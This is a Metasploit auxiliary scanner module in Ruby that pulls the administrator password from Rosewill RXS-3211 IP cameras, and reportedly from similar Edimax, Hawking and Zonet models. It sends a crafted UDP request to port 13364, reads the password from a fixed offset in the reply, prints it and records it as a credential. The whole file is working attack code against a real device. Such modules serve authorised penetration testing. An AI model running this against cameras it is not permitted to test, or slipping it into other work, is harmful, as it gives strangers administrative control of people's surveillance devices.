Path: blob/master/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb
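##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Wire constants of the camera admin protocol as used by this module.
  #
  # They are kept as binary (ASCII-8BIT) strings on purpose: a literal such as
  # "\xff\xf9" takes the file's source encoding, while data read from a socket
  # is ASCII-8BIT, and String#== is false between two non-ASCII strings of
  # different encodings. Without the .b normalisation a reply comparison can
  # silently never match unless the file carries a binary coding comment.
  BROADCAST_MAC = "\xff\xff\xff\xff\xff\xff".b.freeze
  REQUEST_CMD = "\x00\x06\xff\xf9".b.freeze # request flag (\x00) + type (\x06\xff\xf9)
  REPLY_MAGIC = "\x01\x06\xff\xf9".b.freeze # reply flag (\x01) + type, expected at REPLY_MAGIC_OFFSET
  REPLY_MAGIC_OFFSET = 6
  PASSWORD_OFFSET = 333
  PASSWORD_LENGTH = 12
  RECV_TIMEOUT = 0.5 # seconds to wait for the single reply datagram

  def initialize
    super(
      'Name' => 'Rosewill RXS-3211 IP Camera Password Retriever',
      'Description' => %q{
        This module takes advantage of a protocol design issue with the Rosewill admin
        executable in order to retrieve passwords, allowing remote attackers to take
        administrative control over the device. Other similar IP Cameras such as Edimax,
        Hawking, Zonet, etc, are also believed to have the same flaw, but not fully tested.
        The protocol design issue also allows attackers to reset passwords on the device.
      },
      'Author' => 'Ben Schmidt',
      'License' => MSF_LICENSE
    )

    register_options(
      [
        Opt::CHOST,
        Opt::RPORT(13364),
      ]
    )
  end

  # Sends one password request datagram to +ip+ and, when the device answers
  # with the expected reply type, prints the password and stores it as a
  # credential for the target.
  #
  # @param ip [String] target address handed in by the Scanner mixin
  # @return [void]
  def run_host(ip)
    password = nil
    udp_sock = nil

    begin
      udp_sock = Rex::Socket::Udp.create(
        'LocalHost' => datastore['CHOST'],
        'PeerHost' => ip,
        'PeerPort' => datastore['RPORT'],
        'Context' => { 'Msf' => framework, 'MsfExploit' => self }
      )

      udp_sock.put(BROADCAST_MAC + REQUEST_CMD)

      # recvfrom returns [data, host, port]. parse_reply rejects packets with
      # no sender (presumably how the Rex socket reports a timeout) as well as
      # replies of the wrong type or too short to carry the password field.
      res = udp_sock.recvfrom(65535, RECV_TIMEOUT)
      password = parse_reply(res) if res
    rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError
      print_error("Connection error")
    rescue ::Interrupt
      raise
    rescue ::Exception => e # broad by design: one bad host must not abort the scan
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      udp_sock.close if udp_sock
    end

    return unless password

    # NOTE(review): the password is untrusted bytes copied verbatim from the
    # device reply and is printed unescaped; it is stored as-is so the
    # recorded credential is exact.
    print_good("Password retrieved: #{password}")
    report_cred(
      ip: ip, # the host the datagram was actually exchanged with
      port: rport,
      service_name: 'ipcam',
      user: '',
      password: password,
      proof: password
    )
  end

  # Records a password credential and an UNTRIED login against the camera's
  # UDP service in the current workspace.
  #
  # @param opts [Hash] :ip, :port, :service_name, :user, :password, :proof
  # @return the login record returned by create_credential_login
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'udp', # this module speaks UDP (Rex::Socket::Udp); 'tcp' mislabelled the service
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Extracts the password field from a reply datagram.
  #
  # @param pkt [Array] +[data, host, port]+ as returned by the Rex UDP socket
  # @return [String, nil] the PASSWORD_LENGTH-byte password field, or nil when
  #   the packet has no sender, is not the expected reply type, or is too
  #   short to contain the whole password field
  def parse_reply(pkt)
    # Ignore "empty" packets (no sender address).
    return nil unless pkt && pkt[1]

    data = pkt[0].to_s.b

    # Require the whole password field. A truncated reply used to yield a
    # partial or empty-string "password" ("" is truthy in Ruby), which was then
    # printed and stored as a credential.
    return nil if data.bytesize < PASSWORD_OFFSET + PASSWORD_LENGTH
    return nil unless data[REPLY_MAGIC_OFFSET, REPLY_MAGIC.bytesize] == REPLY_MAGIC

    data[PASSWORD_OFFSET, PASSWORD_LENGTH]
  end
end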